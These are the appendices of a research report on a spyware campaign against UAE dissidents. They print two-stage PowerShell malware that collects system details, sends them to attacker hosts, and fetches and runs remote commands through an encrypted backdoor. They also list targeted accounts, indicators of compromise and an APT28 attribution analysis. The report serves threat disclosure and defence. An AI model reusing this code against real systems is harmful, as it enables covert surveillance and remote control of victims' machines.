ResearchTargeted Threats

Keep Calm and (Don’t) Enable Macros Appendices

Appendices

See our original report here.

Appendix A: Stage One PowerShell Command

try
{
    $path = "%temp%"
    $url = "http://adhostingcache.com/ehhe/eh4g4/adcache.txt"
    $extension = "ps1"

    $guid = (get-wmiobject win32_computersystemproduct).UUID

    $tmp = get-wmiobject win32_operatingsystem
    $osinfo = "{"
    $osinfo = $osinfo + '"systemdirectory":"'+$tmp.systemdirectory+'",'
    $osinfo = $osinfo + '"buildnumber":"'+$tmp.buildnumber+'",'
    $osinfo = $osinfo + '"registereduser":"'+$tmp.registereduser+'",'
    $osinfo = $osinfo + '"serialnumber":"'+$tmp.serialnumber+'",'
    $osinfo = $osinfo + '"version":"'+$tmp.version+'"'
    $osinfo = $osinfo + "}"

    $tmp = get-wmiobject win32_computersystem
    $sysinfo = "{"
    $sysinfo = $sysinfo + '"manufacturer":"'+$tmp.manufacturer+'",'
    $sysinfo = $sysinfo + '"model":"'+$tmp.model+'",'
    $sysinfo = $sysinfo + '"name":"'+$tmp.name+'",'
    $sysinfo = $sysinfo + '"primaryownername":"'+$tmp.primaryownername+'",'
    $sysinfo = $sysinfo + '"totalphysicalmemory":"'+$tmp.totalphysicalmemory+'"'
    $sysinfo = $sysinfo + "}"

    $dotnet_array = get-childitem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | get-itemproperty -name version -EA 0 | where {$_.pschildname -match '^(?!S)\p{L}'}
    for ($i=0; $i -lt $dotnet_array.length; $i++){$dotnet = $dotnet + '"'+$dotnet_array[$i].Version+'",'}
    $dotnet = '[' + $dotnet.substring(0, $dotnet.length-1) + ']'

    $info = '{'
    $info = $info + '"guid":"'+$guid+'",'
    $info = $info + '"osinfo":'+$osinfo+','
    $info = $info + '"sysinfo":'+$sysinfo+','
    $info = $info + '"dotnet":'+$dotnet+''
    $info = $info + '}'
    $info_64 = [system.convert]::tobase64string([system.text.encoding]::unicode.getbytes($info))

    # send, receive
    $client = new-object system.net.webclient
    $data = $client.downloadstring("$url/?info=$info_64")

    if([string]::IsNullOrEmpty($data)){exit}

    # drop
    $abspath = [system.environment]::expandenvironmentvariables($path) + "\$guid.$extension"
    [io.file]::writeallbytes($abspath, [convert]::frombase64string($data))

    # execute
    iex $abspath
} catch {}

 

Appendix B: Stage Two PowerShell Command

$QvF=""
$OCs="9026ef20"
$SLlWfL="RaH80/bk5xhNn4bISBUTPQ=="
$mxExBh="$ENV:Temp\IEWebCache.vbs"
function UwDSkX{
try{add-type $tWRv}catch{}
$script:SLlWfL=[system.convert]::frombase64string($SLlWfL)
$script:QvF=(get-wmiobject win32_computersystemproduct).UUID.substring(0,8)
while($true){
try{
$kcLJjB=tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes('&'),$SLlWfL))
if($kcLJjB){
$yDotaj=[RC4]::Crypt($kcLJjB,$SLlWfL)
$yDotaj=[system.text.encoding]::utf8.getstring($yDotaj)
try{
foreach($MpkgwL in $yDotaj -split "&&&"){
$gZb=""
$wQD=$false
$rNlvFz=$MpkgwL -split "&&"
$gZb += "`"ci`":`"$([string]$rNlvFz[0])`""
$gZb += ",`"t`":`"$([string]$rNlvFz[1])`""
switch($rNlvFz[1]){
"9"{
schtasks /end /tn `"IE Web Cache`" | out-null
schtasks /delete /f /tn `"IE Web Cache`" | out-null
remove-item $mxExBh
$gZb += ",`"c`":0"
$wQD=$true
}
default{
$VAMR=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($rNlvFz[2]))
$WLpyjj=iex($VAMR)
$gZb += ",`"c`":`"$WLpyjj`""
}
}
$Nni=[RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb),$SLlWfL)
tYRy($Nni)
if($wQD){exit}
}
}catch{
try{
$gZb += ",`"ec`":`"$([string]$lastexitcode)`""
$gZb += ",`"c`":`"$($_.exception.message)`""
tYRy([RC4]::Crypt([system.text.encoding]::utf8.getbytes($gZb), $SLlWfL))
}catch{
}
}
}
}catch{}
Start-Sleep -s 600
}
}
function tYRy($hxWR){
$eVFXy=$null
$HXWL=New-Object -ComObject "Msxml2.ServerXMLHTTP.6.0"
$HXWL.open('POST',"https://incapsulawebcache.com/cache/cache.nfo",$false)
$HXWL.setrequestheader("Content-length",$hxWR.length)
$HXWL.setrequestheader("User-Agent", "Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)")
$HXWL.setrequestheader("Connection","close")
$HXWL.setoption(2,13056)
$HXWL.send("$OCs$QvF" + [system.convert]::tobase64string($hxWR))
$eVFXy=$HXWL.responsebody
return $eVFXy
}
$tWRv = @"
using System.Text;
public static class RC4{
=ZZ
byte[] inbytes=input;
byte[] result=new byte[inbytes.Length];
int x, y, j=0;
int[] box=new int[256];
for (int i=0; i < 256; i++){box[i]=i;}
for (int i=0; i < 256; i++){
j=((char)key[i % key.Length] + box[i] + j) % 256;
x=box[i];
box[i]=box[j];
box[j]=x;
}
x=0;
y=0;
for(int i = 0; i < inbytes.Length; i++){
x=(x + 1) % 256;
y=(y + box[x]) % 256;
j=box[x];
box[x]=box[y];
box[y]=j;
result[i]=(byte)(inbytes[i] ^ box[(box[x] + box[y]) % 256]);
}
return result;
}
}
"@
try{
$aTKs=new-object -typename system.threading.mutex -argumentlist $false, "Global\YZi"
if($aTKs.waitone(100)){UwDSkX}
}finally{try{$aTKs.releasemutex()}catch{}}

 

Appendix C: JavaScript Profiling File

Due to its large size, this appendix is available in an external Google Document:
https://docs.google.com/a/citizenlab.ca/document/d/106EQw_SzppLXBKm-bA2F3nTZuQ_z7Lx8EcLigp9UgxE/edit?usp=sharing

 

Appendix D: Public Stealth Falcon Tweets

Attacker Victim Link
@Bu_saeed2 @Kh_OZ http://twitter.com/Bu_saeed2/status/156781983983349760
@Bu_saeed2 @saalaam25 http://twitter.com/Bu_saeed2/status/158272650995695616
@Bu_saeed2 @alshamsi789 http://twitter.com/Bu_saeed2/status/156785619744473088
@Bu_saeed2 @BdrBakalla http://twitter.com/Bu_saeed2/status/156406670866653184
@Bu_saeed2 @omran83 http://twitter.com/Bu_saeed2/status/158267593269063680
@Bu_saeed2 @abu_sa33d https://twitter.com/Bu_saeed2/status/158269006451707904
@islam_way_2030 @Morsyuae http://twitter.com/islam_way_2030/status/212563401761755137
@islam_way_2030 @WeldBudhabi https://twitter.com/islam_way_2030/status/232392466760863744
@islam_way_2030 @Rmadanhom https://twitter.com/islam_way_2030/status/232392808336588800
@islam_way_2030 @intihakat https://twitter.com/islam_way_2030/status/232393358243401728
@islam_way_2030 @bomsabih https://twitter.com/islam_way_2030/status/232394930285318144
@islam_way_2030 @hwghp https://twitter.com/islam_way_2030/status/232395293449146368
@um_zainab123 @haalreem http://twitter.com/um_zainab123/status/255210220907802624
@um_zainab123 @alsalam45 http://twitter.com/um_zainab123/status/255230862914899969
@1a1_ahmed @magdy_masood1 http://twitter.com/1a1_ahmed/status/367590431762051072
@MiriamKhaled @uaelionheart http://twitter.com/MiriamKhaled/status/156804441436205056
@MiriamKhaled @uaepolitician http://twitter.com/MiriamKhaled/status/156795446910664704
@MiriamKhaled @bosalim77 http://twitter.com/MiriamKhaled/status/156756400108867584
@MiriamKhaled @zayedson7 http://twitter.com/MiriamKhaled/status/156803937482190848
@MiriamKhaled @71uae https://twitter.com/MiriamKhaled/status/156625204280434688
@JJory22 @helalsalem11 https://twitter.com/JJory22/status/159144594574020608
@pooruae @2011national https://twitter.com/pooruae/status/156766408137646080
@pooruae @youae_dxb https://twitter.com/pooruae/status/156766841702854657
@r7aluae2 @newbedon https://twitter.com/r7aluae2/status/156418043424157696

Additional Details

  • @saalaam25 was targeted on 14 January 2012.  The account stopped tweeting on 5 December 2014.  The account tweeted about political issues in the UAE.

  • @alshamsi789 was targeted on 10 January 2012.  The account is still active, and tweets about political issues in the UAE.

  • @BdrBakalla was targeted on 9 January 2012.  The account is still active, and gives its location as “Abu Dhabi.”

  • @morsyuae was targeted on 12 June 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

  • @HaAlReem was targeted on 7 October 2012.  The account stopped tweeting on 17 August 2013.  The account appeared to tweet in solidarity with political prisoners in the UAE.

  • @alsalam45 was targeted on 7 October 2012.  The account stopped tweeting on 13 August 2015.  The account appeared to tweet in solidarity with political prisoners in the UAE.

  • @magdy_masood1 was targeted on 14 August 2013.  The account stopped tweeting on 30 July 2014.  The account appeared to tweet about Gaza, and against Egyptian President Sisi.

  • @UAELionHeart was targeted on 10 January 2012.  The account stopped tweeting on 30 June 2013.  The account appeared to tweet in solidarity with political prisoners in the UAE.

  • @uaepolitician was targeted on 10 January 2012.  The account appears to no longer exist.

  • @bosalim77 was targeted on 10 January 2012.  The account is currently suspended.

  • @ZayedSon7 was targeted on 10 January 2012.  The account appears to no longer exist.

  • @helalsalem11 was targeted on 16 January 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

  • @2011national, now renamed to @2013national, was targeted on 10 January 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

  • @abu_sa33d was targeted on 14 January 2012.  The account is still active, and appears to tweet both Jihadi content, and solidarity with political prisoners in the UAE.

  • @YouAE_Dxb was targeted on 10 January 2012.  The account appears to no longer exist.

  • @hwghp was targeted on 5 August 2012.  The account is still active, and describes itself as “in solidarity with the UAE detainees.”  The account appears to tweet in solidarity with political prisoners in the UAE.

  • @Rmadanhom, now renamed to @Duaamadloom, was targeted on 5 August 2012.  The account is still active, and appears to tweet in solidarity with political prisoners in the UAE.

 

Appendix E: Results of aax.me Scan

Due to its large size, this appendix is available in an external Google Sheet:

https://docs.google.com/a/citizenlab.ca/spreadsheets/d/1ulfkNzoPCiaVKea9ZOW28V8J8FUXnzWDhBQahj9fUPo/edit?usp=sharing

 

Appendix F: Indicators of Targeting

Domains (Attack on Donaghy)

aax.me
adhostingcache.com
adhostingcaches.com
incapsulawebcache.com

IPs (Attack on Donaghy)

83.125.20.162
87.120.37.83
95.215.44.37

Stage One C2 Server IP Addresses

103.208.86.23
131.72.136.224
185.62.188.163
185.86.148.245
193.105.134.244
37.59.138.119
45.125.244.196
46.183.221.240
87.121.52.96
91.219.237.142
94.242.202.168
95.183.50.230
95.183.51.164
95.183.51.32

Stage One C2 Server Domains

adlinkmetric.com
adlinkmetrics.com
bestairlinepricetags.com
clickstatistic.com
fasttravelclearance.com
optimizedimghosting.com
rapidlinkhit.com
safeadspace.com
simpleadbanners.com
tinyimagehosting.com
windowshealthcheck.com

Stage Two C2 Server IP Addresses

103.193.4.112
107.181.128.99
151.80.141.155
151.80.158.81
151.80.95.42
158.69.3.165
178.17.170.106
178.17.170.183
178.17.171.104
178.17.171.234
178.17.174.21
185.112.82.4
185.117.73.169
185.141.25.225
185.24.233.110
185.24.233.202
185.24.234.15
185.61.148.176
185.61.148.85
185.61.149.2
185.62.190.127
185.77.129.103
185.86.148.46
185.86.148.55
185.86.149.116
185.99.132.210
188.0.236.83
188.165.80.78
190.10.10.189
190.123.45.141
190.123.45.147
193.105.134.10
193.105.134.13
198.50.177.201
199.201.121.148
200.122.181.117
212.56.214.42
37.59.122.150
37.59.138.117
46.183.219.81
46.183.221.187
46.183.221.230
46.183.221.244
5.149.252.143
5.154.190.120
5.154.190.159
5.9.173.181
78.46.254.161
84.200.16.63
87.120.37.83
87.121.52.95
91.216.245.56
91.236.116.210
91.236.116.44
92.222.66.2
93.174.88.206
94.102.56.140
94.102.56.141
94.23.183.9
94.242.232.13
95.183.50.53
95.183.51.133
95.183.51.21
95.183.53.191
95.215.44.165
95.215.44.2
95.215.44.207

Stage Two C2 Server IP Addresses (Historical)

119.18.57.236
119.18.58.26
124.217.246.199
136.243.250.168
178.17.170.102
178.17.171.173
185.45.192.136
185.62.188.138
185.62.189.16
190.10.9.219
192.71.218.164
198.105.120.51
198.105.122.70
198.105.125.32
199.127.226.243
199.201.121.144
31.220.43.237
46.19.141.188
46.19.143.233
46.28.202.130
46.28.202.93
5.1.88.170
5.196.140.50
5.199.171.40
5.199.171.61
87.117.255.177
87.121.52.170
93.174.88.198
95.183.49.134
95.215.44.251

Stage Two C2 Server Domains

adobereaderupdater.com
airlineadverts.com
akamai-host-network.com
akamai-hosting-network.com
akamaicachecdn.com
akamaicloud.net
akamaicss.com
akamaihostcdn.net
akamaiwebcache.com
appleimagecache.com
burst-media.com
cachecontent.com
cdn-logichosting.com
cdnimagescache.com
chromeupdater.com
cloudburstcdn.net
cloudburstercdn.net
cloudimagecdn.com
cloudimagehosters.com
contenthosts.com
contenthosts.net
dnsclienthelper.com
dnsclientresolver.com
domainimagehost.com
dotnetupdatechecker.com
dotnetupdates.com
dropboxsyncservice.com
edgecacheimagehosting.com
flashplayersupdates.com
flashplayerupdater.com
iesafebrowsingcache.com
iesaferbrowsingcache.com
javaupdatecache.com
javaupdatersvc.com
javaupdatescache.com
javaupdatesvc.com
limelightimagecache.com
livewebcache.com
media-providers.net
mediacachecdn.com
mediacachecdn.net
mediacloudsolution.com
mediacloudsolutions.net
mediaimagecache.com
mediaproviders.net
ministrynewschannel.com
ministrynewsinfo.com
msofficesso.com
msofficeupdates.com
mswindowsupdater.com
netassistcache.com
netcloudcdn.com
optimizercache.com
oraclejavaupdate.com
oraclejavaupdater.com
printspoolerservices.com
safeadvertimgs.com
webanalyticstats.com
wincertificateupdater.com
winconnectors.com
windefenderupdater.com
windowsconnector.com
windowsdefenderupdater.com
windowsearchcache.com
windowspatchmanager.com
windowssearchcache.com
windowsupdatecache.com
windowsupdatescache.com

Related Domains

amnkeysvc.com
amnkeysvcs.com
scheduledupdater.com
yeastarr.com

Suspected Attack Domains

velocityfiles.com
call4uaefreedom.com
uaefreedom.com (on or after October 7, 2012)
a7rarelemarat.com
al7ruae2014.com

Social Media or Email Accounts

the_right_to_fight@openmailbox.org
andrew.dwight389@outlook.com
@a7rarelemarat
@islam_way_2030
@bu_saeed2
@um_zainab123
@1a1_ahmed
@miriamkhaled
@JJory22
@pooruae
@r7aluae2
@Dwight389

Related Social Media Accounts

@al7ruae2014 (Instagram)
@FreeUAE2012

 

Appendix G: No Evidence of APT28 Connection

Five (or six) of the domains we linked to our operator were registered using anonymousbitcoindomains[.]com (ABCD), a now-defunct “anonymous” registration service that accepted payment in Bitcoin, through which it appears that only about 89 domains were ever registered (all between 2014-07-09 and 2015-04-30).

The service touted the small amount of information collected from its users:

“You don’t need to create an account when you buy a hot dog in the streets, do you? Neither should you when you want to register a domain name. Just like the hot dog sales dude, we validate the money you pay with. And if that’s good, then we’re happy to sell you a domain name!”

There appears to be belief in the security community that a significant amount of ABCD activity involved a group known as APT28.  APT28 is said to be supported by the Russian Government,1 and has targeted “NATO, governments of Russia’s neighbors, and U.S. defense contractors”.2  For instance, PwC Threat Intelligence lists one of the domain names we believe is related to our operator, netassistcache.com, as an APT28 domain.  Though the attacks we profile in this report do not appear to align with known APT28 objectives, and the malware sent to Donaghy does not relate to known APT28 malware, we nevertheless feel compelled to examine whether our operator may be related to APT28.  We outline our research below; we do not find any strong indications to suggest that our operator is related to APT28.

A Comparison of Registration Dates

Below, we list the five ABCD domains we linked to our operator, and a sixth ABCD domain that we believe may belong to our operator:

ABCD Domain Registration Date
windowsearchcache.com 2014-11-13
adhostingcache.com 2014-12-01
netassistcache.com 2015-02-25
mediacloudsolution.com 2015-03-05
al7ruae2014.com (possible) 2015-03-05
contenthosts.net 2015-03-08

We noted that several APT28 domains were registered on 2015-03-05, the same day as one of our operator’s domains (and a second domain that may belong to our operator):

al7ruae2014[.]com (possibly our operator)
defencereview[.]net
intelnetservice[.]com (APT28)3
intelsupport[.]net (APT28)4
mediacloudsolution[.]com (our operator)
microsoftdriver[.]com (APT28)5
nato-int[.]com
osce-military[.]org
windowsappstore[.]net (APT28)6

However, there is no further evidence that the APT28 domains are related to our operator’s domains (e.g., there is no overlap in passive DNS).

A “suspension” of ABCD domains

On 2 July 2015, the DNS entries for at least 21 domain names registered via ABCD were updated to IP address 109.71.51.58, according to passive DNS data.  Six of these domain names appear to be directly related to APT28, via public information (microsoftdriver.com and windowsappstore.net appear in an APT28 sample,7 dailyforeignnews.com was documented distributing APT28 malware,8 and diplomatnews.org, worldpoliticsnews.org, and uz-news.org were documented hosting the APT28 exploit kit).9

The Internet Archive records that microsoftdriver.com returned an apparently nonstandard “Notice: Suspended domain” page 12 days after the transfer on 14 July 2015.10  We also identified another ABCD domain, bagacamesmo.biz, which was redirected to 109.71.51.58 on 9/23/2014.  Five days later, the Internet Archive records that it displayed a substantially similar notice of domain suspension, except it suggested the suspension was in relation to the “FraudWatch International Security Operations Centre”.11  The reference to FraudWatch appears to be a reference to the eponymous provider of brand-protection services, including website takedown services.12  The Internet Archive records that the suspension message on bagacamesmo.biz was later updated to the same message as the one on microsoftdriver.com.13  The only other instance we found of an ABCD domain whose DNS was changed to 109.71.51.58 was policeoracle.org, which was changed on 18 April 2015.  We note that the “Last-Modified” header for microsoftdriver.com reads 17 April 2015.

Therefore, our hypothesis is that ABCD controls 109.71.51.58.  When they conducted what appears to be their first domain “suspension” (bagacamesmo.biz, perhaps upon request from FraudWatch), they created a custom suspension page indicating this.  Perhaps their second domain “suspension” (policeoracle.org) was on request from a different party, therefore they updated their page to delete the reference to FraudWatch.

One of the at least 21 domain names suspended in this manner on 2 July 2015 was windowsearchcache.com.  However, the domain appears to have been “un-suspended” on 22 July 2014, in that its DNS entry before the suspension was restored.  It is the only ABCD domain name we were able to identify that was suspended and then un-suspended.  It was also the only suspended ABCD domain name that we were able to trace to our operator.  We are not sure which party requested the suspension, and why ABCD decided to “un-suspend” windowsearchcache.com.

We are unaware of any evidence linking APT28 to windowsearchcache.com.  That windowsearchcache.com appears to be the only un-suspended ABCD domain (and the only one we claim is not APT28), suggest that it may be unrelated to APT28 activity.

 

Footnotes

1https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html
2http://www.wsj.com/articles/hacking-trail-leads-to-russia-experts-say-1414468869
3https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/
4https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/
5https://www.virustotal.com/en/file/e1259372d15bb5001be18f03dddbdc117710d7a64829dad3a95829413783f0d7/analysis/
6https://www.virustotal.com/en/file/e1259372d15bb5001be18f03dddbdc117710d7a64829dad3a95829413783f0d7/analysis/
7https://www.virustotal.com/en/file/e1259372d15bb5001be18f03dddbdc117710d7a64829dad3a95829413783f0d7/analysis/
8https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/
9https://www.nsec.io/wp-content/uploads/2015/05/Northsec_sednit_joan.pdf
10https://web.archive.org/web/20150714171710/http://www.microsoftdriver.com/
11https://web.archive.org/web/20140928075555/http://bagacamesmo.biz/
12http://fraudwatchinternational.com/services/site-take-down/
13https://web.archive.org/web/20150801004320/http://bagacamesmo.biz/